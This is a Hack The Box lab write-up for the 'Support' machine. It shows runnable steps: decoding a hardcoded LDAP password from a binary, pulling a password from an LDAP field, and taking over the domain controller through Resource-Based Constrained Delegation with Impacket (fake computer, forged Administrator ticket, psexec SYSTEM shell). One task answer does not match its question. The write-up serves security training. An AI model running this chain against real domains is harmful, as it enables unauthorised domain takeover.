Support – Hack The Box

Abuse GenericAll to Create a Fake Computer

Task 1 – How many shares is Support showing on SMB?

Let’s start with an nmap scan:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.230.181
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-22 18:25 CET
Nmap scan report for 10.129.230.181
Host is up (0.053s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-22 17:25:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5s
| smb2-time: 
|   date: 2026-02-22T17:25:21
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 55.52 seconds

From the nmap scan, the domain is support.htb and port 445 (SMB) is open.

Let’s enumerate the shares using smbclient:

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -L //10.129.230.181
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.230.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Hence we find 6 shares.

Task 2 – Which share is not a default share for a Windows domain controller?

The support-tools share is not a default share for a Windows Domain Controller.

Task 3 – Almost all of the files in this share are publicly available tools, but one is not. What is the name of that file?

The file is UserInfo.exe.zip.

Task 4 – What is the hardcoded password used for LDAP in the UserInfo.exe binary?

I connected to the share using smbclient and downloaded the zip file:

┌──(kali㉿kali)-[~/Desktop/Support]
└─$ smbclient //10.129.230.181/support-tools
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 19:01:06 2022
  ..                                  D        0  Sat May 28 13:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 13:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 13:19:55 2022
  putty.exe                           A  1273576  Sat May 28 13:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 13:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 19:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 13:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 13:19:43 2022

                4026367 blocks of size 4096. 959555 blocks available
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now

┌──(kali㉿kali)-[~/Desktop/Support]
└─$ smbclient //10.129.230.181/support-tools
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (279.1 KiloBytes/sec) (average 279.1 KiloBytes/sec)
smb: \> 

I then extracted the zip file, which contained multiple executables.

I tried to dump the password using strings, but did not find it in cleartext:

┌──(kali㉿kali)-[~/Desktop/Support]
└─$ strings UserInfo.exe
!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
,Er
,ZsE
BSJB
v4.0.30319
#Strings
#GUID
#Blob
<Main>d__0
<>u__1
Task`1
CommandLineParser`1
TaskAwaiter`1
IParserResult`1
Int32
<OnExecuteAsync>d__2
Command`2
Int64
<Module>
<Main>
get_ASCII
mscorlib
ParseAsync
OnExecuteAsync
get_PropertiesToLoad
Protected
AwaitUnsafeOnCompleted
get_IsCompleted
System.Collections.Specialized
<UserName>k__BackingField
<LastName>k__BackingField
<FirstName>k__BackingField
<Verbose>k__BackingField
MatthiWare.CommandLine.Abstractions.Command
getPassword
enc_password
get_Message
IDisposable
Console
set_AppName
get_UserName
set_UserName
get_LastName
set_LastName
get_FirstName
set_FirstName
username
FromFileTime
DateTime
FindOne
MatthiWare.CommandLine
WriteLine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
set_AuthenticationType
OnConfigure
ReadOnlyCollectionBase
get_Verbose
set_Verbose
verbose
Dispose
Create
<>1__state
Write
RequiredAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
NameAttribute
AsyncStateMachineAttribute
DefaultValueAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
value
UserInfo.exe
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
MatthiWare.CommandLine.Abstractions.Parsing
get_Task
FindAll
Program
get_Item
System
CancellationToken
cancellationToken
Main
System.Reflection
ResultPropertyValueCollection
StringCollection
SearchResultCollection
ResultPropertyCollection
SetException
Description
UserInfo
AsyncTaskMethodBuilder
ICommandConfigurationBuilder
<>t__builder
DirectorySearcher
FindUser
GetUser
printUser
CommandLineParser
TaskAwaiter
GetAwaiter
set_Filter
IEnumerator
GetEnumerator
.ctor
.cctor
System.Diagnostics
UserInfo.Commands
DiscoverCommands
UserInfo.Services
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.DirectoryServices
DebuggingModes
get_Properties
AuthenticationTypes
MatthiWare.CommandLine.Core.Attributes
GetBytes
args
System.Threading.Tasks
Contains
System.Collections
commandOptions
GlobalOptions
FindUserOptions
GetUserOptions
CommandLineParserOptions
options
get_HasErrors
Concat
Object
get_Default
SearchResult
GetResult
SetResult
get_Current
get_Count
Start
Convert
last
first
MoveNext
System.Text
GetExecutingAssembly
LdapQuery
query
DirectoryEntry
entry
WrapNonExceptionThrows
UserInfo
Copyright 
  2022
$5a280d0b-9fd0-4701-8f96-82e2f1ea9dfb
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8 
UserInfo.Program+<Main>d__0
/UserInfo.Commands.FindUser+<OnExecuteAsync>d__2
.UserInfo.Commands.GetUser+<OnExecuteAsync>d__2
username
Username
first
First name
last
        Last name
verbose
Verbose output
RSDS
C:\Users\0xdf\source\repos\UserInfo\obj\Release\UserInfo.pdb
_CorExeMain
mscoree.dll

Opening UserInfo.exe.config, we find it describes a .NET Framework 4.8 application:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
    </startup>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>

So let’s reverse UserInfo.exe using dnSpy. There I found an encoded password for the user armando that needs to be deobfuscated first.

I wrote a Python script to decode it:

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

# Step 1: Base64 decode
data = base64.b64decode(enc_password)

# Step 2: XOR with repeating key and 223
decoded = bytearray()

for i in range(len(data)):
    decoded_byte = data[i] ^ key[i % len(key)] ^ 223
    decoded.append(decoded_byte)

# Step 3: Convert to string
print(decoded.decode("utf-8"))

Hence the hardcoded password, once decoded, is nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz. Now we have a set of credentials:

- username: armando
- password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Task 5 – Which field in the LDAP data for the user named support stands out as potentially holding a password?

Let’s try to query LDAP with ldapsearch, using armando’s credentials:

ldapsearch -x -H ldap://support.htb -D "support.htb\\armando" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "(sAMAccountName=armando)" *

But it did not work. I then tried another command, which still did not work:

ldapdomaindump -u 'support.htb\armando' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.129.230.181

I then tried BloodHound, which also did not work.

After being stuck for a couple of hours, I remembered the executable UserInfo.exe we found. Let’s try to run it. I was not able to run it using Wine on Kali, so I checked the writeup and found they ran it and captured the credentials it sends to LDAP with Wireshark. The captured credentials are:

- username: ldap
- password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Let’s run ldapsearch on the support user now:

┌──(kali㉿kali)-[~/Desktop/Support]
└─$ ldapsearch -H ldap://dc.support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' "(sAMAccountName=support)"
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (sAMAccountName=support)
# requesting: ALL
#

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z

# search reference
ref: ldap://ForestDnsZones.support.htb/DC=ForestDnsZones,DC=support,DC=htb

# search reference
ref: ldap://DomainDnsZones.support.htb/DC=DomainDnsZones,DC=support,DC=htb

# search reference
ref: ldap://support.htb/CN=Configuration,DC=support,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Now we have a new set of credentials:

- username: support
- password: Ironside47pleasure40Watchful

We can then log in using evil-winrm and submit the flag.

Task 6 – What open port on Support allows a user in the Remote Management Users group to run PowerShell commands and get an interactive shell?

5985

Task 7 – Bloodhound data will show that the support user has what privilege on the DC.SUPPORT.HTB object?

I ran BloodHound and found that the support user has GenericAll on DC.SUPPORT.HTB.

Task 8 – A common attack with generic all on a computer object is to add a fake computer to the domain. What attribute on the domain sets how many computer accounts a user is allowed to create in the domain?

GenericAll grants full rights over an object.

Task 9 – A common attack with generic all on a computer object is to add a fake computer to the domain. What attribute on the domain sets how many computer accounts a user is allowed to create in the domain?

ms-ds-machineaccountquota

Task 10 – Following the steps for the Computer Takeover attack, eventually I get a ticket for the administrator, which Rubeus says should give administrator access in that session, but it doesn’t work. What is the name of the script from Impacket that can convert that ticket to ccache format?

Searching online, we find the script is ticketConverter.py. It converts Kerberos tickets between the Windows and Linux formats:

  • .kirbi → .ccache
  • .ccache → .kirbi

Task 11 – What is the name of the environment variable on our local system that we’ll set to that ccache file to allow use of files like psexec.py with the -k and -no-pass options?

After some research online, the environment variable is KRB5CCNAME.

Task 12 – Flag

  • Based on the questions, we should first check ms-DS-MachineAccountQuota (MAQ) to learn how many computers the support user can add.
  • Abuse GenericAll and add a fake computer:

You have GenericAll on DC$
        ↓
You create FAKE01$ (a machine account you control)
        ↓
rbcd.py tells DC$: "trust FAKE01$"
        ↓
Now you use FAKE01$'s credentials to request a ticket
AS IF you were Administrator (S4U2Self + S4U2Proxy)
        ↓
You get a Kerberos ticket for Administrator → full access

  • Obtain a service ticket.
  • Convert the ticket to Linux (ccache) format.

Starting with the first step, I enumerated ms-DS-MachineAccountQuota and found it is 10:

$ ldapsearch -H ldap://dc.support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' "(objectClass=domain)" ms-DS-MachineAccountQuota
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (objectClass=domain)
# requesting: ms-DS-MachineAccountQuota 
#

# support.htb
dn: DC=support,DC=htb
ms-DS-MachineAccountQuota: 10

# search reference
ref: ldap://ForestDnsZones.support.htb/DC=ForestDnsZones,DC=support,DC=htb

# search reference
ref: ldap://DomainDnsZones.support.htb/DC=DomainDnsZones,DC=support,DC=htb

# search reference
ref: ldap://support.htb/CN=Configuration,DC=support,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

This means that any authenticated domain user can create up to 10 computer objects. Let’s now add a fake computer using Impacket:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'Password123!' -dc-ip 10.129.8.180 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account FAKE01$ with password Password123!.

Now we need the SID of the new computer. LDAP returns objectSid as base64-encoded binary, which here is AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL1RcAAA==:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ldapsearch -H ldap://dc.support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' "(sAMAccountName=FAKE01$)" objectSid
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (sAMAccountName=FAKE01$)
# requesting: objectSid 
#

# FAKE01, Computers, support.htb
dn: CN=FAKE01,CN=Computers,DC=support,DC=htb
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL1RcAAA==

# search reference
ref: ldap://ForestDnsZones.support.htb/DC=ForestDnsZones,DC=support,DC=htb

# search reference
ref: ldap://DomainDnsZones.support.htb/DC=DomainDnsZones,DC=support,DC=htb

# search reference
ref: ldap://support.htb/CN=Configuration,DC=support,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3
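The objectSid values above are the raw binary SID, base64-encoded by ldapsearch, and the support entry in Task 5 also carries numeric userAccountControl and pwdLastSet fields. The helper below is an added example, not code from the original writeup or from Impacket: it decodes those fields using the documented Windows layouts (SID, userAccountControl bit flags, FILETIME), with the input constants copied from the ldapsearch output on this page.

```python
import base64
import struct
from datetime import datetime, timedelta, timezone

# Constructed from the ldapsearch output above ("objectSid::" is base64 of the binary SID).
SUPPORT_SID_B64 = "AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA=="
FAKE01_SID_B64 = "AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL1RcAAA=="

# Subset of the documented userAccountControl bits.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
}

def decode_sid(b64: str) -> str:
    """Turn the binary objectSid LDAP returns into its S-1-5-21-... text form."""
    raw = base64.b64decode(b64)
    revision, sub_count = raw[0], raw[1]
    expected = 8 + 4 * sub_count
    if revision != 1 or len(raw) != expected:
        raise ValueError(f"malformed SID: rev={revision} len={len(raw)} want={expected}")
    # Identifier authority: 48-bit big-endian (bytes 2..7); sub-authorities: 32-bit little-endian.
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{sub_count}I", raw[8:])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def rid(b64: str) -> int:
    """The last sub-authority is the relative identifier of the account."""
    return int(decode_sid(b64).rsplit("-", 1)[1])

def uac_flags(value: int) -> list:
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def filetime_to_utc(ft: int) -> datetime:
    # Windows FILETIME: 100 ns intervals since 1601-01-01 UTC.
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

# Constructed from the support entry in the Task 5 ldapsearch output.
SUPPORT_ENTRY = {
    "sAMAccountName": "support",
    "objectSid": SUPPORT_SID_B64,
    "userAccountControl": "66048",
    "pwdLastSet": "132982099209777070",
}

def describe_account(entry: dict) -> dict:
    """Decode the binary and numeric fields of one LDAP user entry."""
    return {
        "sid": decode_sid(entry["objectSid"]),
        "rid": rid(entry["objectSid"]),
        "flags": uac_flags(int(entry["userAccountControl"])),
        "pwd_last_set": filetime_to_utc(int(entry["pwdLastSet"])).isoformat(),
    }
```

Both SIDs share the domain prefix S-1-5-21-1677581083-3380853377-188903654; support is RID 1105 and FAKE01$ is RID 6101, which is the SID rbcd.py prints further down.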

Now we need to abuse Resource-Based Constrained Delegation (RBCD):

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./rbcd.py -delegate-from 'FAKE01$' -delegate-to 'DC$' -action write -dc-ip 10.129.8.180 'support.htb/support:Ironside47pleasure40Watchful'        
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FAKE01$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FAKE01$      (S-1-5-21-1677581083-3380853377-188903654-6101)

Now let’s get the service ticket:

┌──(kali㉿kali)-[~]
└─$ /usr/share/doc/python3-impacket/examples/getST.py -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.129.8.180 'support.htb/FAKE01$:Password123!' 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

The ticket is already saved in ccache format, so there is no need to convert it.

The final step is to psexec in (I moved the ticket to /tmp for permission reasons):

┌──(kali㉿kali)-[~]
└─$ cp ~/Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache /tmp/admin.ccache

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=/tmp/admin.ccache

┌──(kali㉿kali)-[~]
└─$ sudo -E impacket-psexec -k -no-pass dc.support.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file zjfTaoPS.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service UjGY on dc.support.htb.....
[*] Starting service UjGY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

Attack Summary – Resource-Based Constrained Delegation (RBCD)

1. Reconnaissance: We checked ms-DS-MachineAccountQuota, which was set to 10, meaning any regular domain user can add up to 10 computer accounts to the domain. This was our entry point.

2. Creating a Fake Computer: We used our support user credentials to add a fake machine account FAKE01$ to the domain. This gave us a computer account we fully control — including its password.

3. Abusing GenericAll with RBCD: We had GenericAll permission over the Domain Controller object. This means we could modify any of its attributes. We abused this by writing to the DC’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, telling it: “trust FAKE01$ to act on behalf of any user”. This is the core of RBCD.

4. Requesting a Forged Ticket: Using FAKE01$’s credentials, we triggered the Kerberos S4U2Self + S4U2Proxy protocol. This is basically asking the KDC: “FAKE01$ wants to act as Administrator to access the DC’s CIFS service”. Since we set up the trust in step 3, the KDC issued the ticket.

5. Using the Ticket: We exported the .ccache ticket and used psexec with it to authenticate as Administrator to the DC — giving us a SYSTEM shell.